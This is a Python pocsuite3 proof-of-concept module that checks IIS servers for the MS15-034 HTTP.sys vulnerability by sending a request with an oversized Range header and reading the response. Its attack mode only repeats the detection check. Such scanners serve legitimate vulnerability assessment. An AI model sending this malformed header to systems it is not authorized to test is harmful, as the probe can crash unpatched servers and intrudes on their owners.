#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
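class TestPOC(POCBase):
    """pocsuite3 PoC that checks a host for MS15-034 (CVE-2015-1635).

    The check is a detection probe only: one GET carrying an oversized
    ``Range`` header, classified by the response body.  ``_attack`` just
    re-runs the same check (see below), so this module never does more
    than the verification request.
    """

    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2019-1-8'
    createDate = '2019-1-8'
    updateDate = '2019-1-8'
    references = ['', ]
    name = 'The IIS Vul (CVE-2015-1635,MS15-034)Check'
    appPowerLink = 'https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-034'
    appName = 'IIS'
    appVersion = '7.0'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    MS15-034 HTTP.sys DoS And Possible Remote Code Execution.
    HTTP.sys Remote Code Execute.
    '''

    # Substrings of the ``Server`` response header that mark an HTTP.sys /
    # IIS service.  Only hosts matching one of these get the Range probe.
    SERVER_TAGS = ('Microsoft-HTTP', 'Microsoft-IIS')

    # Connect/read timeout in seconds.  The original requests had no
    # timeout, so a host that accepts the TCP connection but never answers
    # would block the scan indefinitely.
    REQUEST_TIMEOUT = 10

    @classmethod
    def _check(cls, url):
        """Return ``(vulnerable, message)`` for *url*.

        Fetches *url* once without special headers and inspects the
        ``Server`` header; hosts that do not look like IIS are reported as
        ``(False, ...)`` and never receive the Range probe.  Every network
        error is converted into a ``(False, reason)`` tuple instead of being
        raised, so a failing port does not abort ``_verify``.
        """
        try:
            first = req.get(url, timeout=cls.REQUEST_TIMEOUT)
            # A missing Server header simply means "not identified as IIS";
            # the original indexed headers['server'] and turned that into
            # a KeyError message.
            remote_server = first.headers.get('server', '')
            # BUG FIX: the original tested a bare generator expression,
            # which is always truthy, so every host (IIS or not) was probed
            # and the "Not IIS" branch was unreachable.
            if any(tag in remote_server for tag in cls.SERVER_TAGS):
                return cls._test_ms15_034(url)
            return (False, 'Web Service Is Not IIS\n[+] May Be ' + remote_server)
        except req.exceptions.Timeout:
            # Timeout is the parent of ConnectTimeout and ReadTimeout, both
            # of which are possible now that a timeout is set.
            return (False, 'timeout')
        except Exception as e:
            # Boundary catch: the scan is best-effort and any other failure
            # is reported as the check's message rather than propagated.
            return (False, '{}'.format(str(e)))

    @classmethod
    def _test_ms15_034(cls, url):
        """Send the MS15-034 detection request and classify the reply.

        Returns ``(True, body)`` when the body contains the 416 reason
        phrase, ``(False, 'The vulnerability has been fixed!')`` when the
        patched server rejects the header, and a manual-check message
        otherwise.  Network errors propagate to ``_check``.
        """
        headers = {'Host': 'stuff',
                   'Range': 'bytes=0-18446744073709551615'}
        response = req.get(url, headers=headers, timeout=cls.REQUEST_TIMEOUT)
        body = response.content
        if b'Requested Range Not Satisfiable' in body:
            return (True, body)
        if b'The request has an invalid header name' in body:
            return (False, 'The vulnerability has been fixed!')
        return (False, 'The IIS service was unable to display the vulnerability exists, the need for manual testing!')

    def _verify(self):
        """Check ``self.url`` and return the pocsuite ``Output``.

        The port from the URL is used when present; otherwise 443 for an
        ``https`` URL and 80 for anything else (the original always fell
        back to 80, which sent https requests to the wrong port).  On
        success ``result['VerifyInfo']['URL']`` holds ``host:port``.
        """
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [443 if pr.scheme == 'https' else 80]
        for port in ports:
            url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            # _check never raises, so the original bare ``except: pass``
            # (which also hid programming errors) is not needed.
            status, _msg = self._check(url)
            if status:
                result['VerifyInfo'] = {
                    'URL': '{}:{}'.format(pr.hostname, port),
                }
                break
        return self.parse_output(result)

    def _attack(self):
        """Attack mode is identical to verification; no crash is triggered."""
        return self._verify()

    def parse_output(self, result):
        """Wrap *result* in an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output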
# Register the PoC class with pocsuite3 (register_poc comes from pocsuite3.api).
register_poc(TestPOC)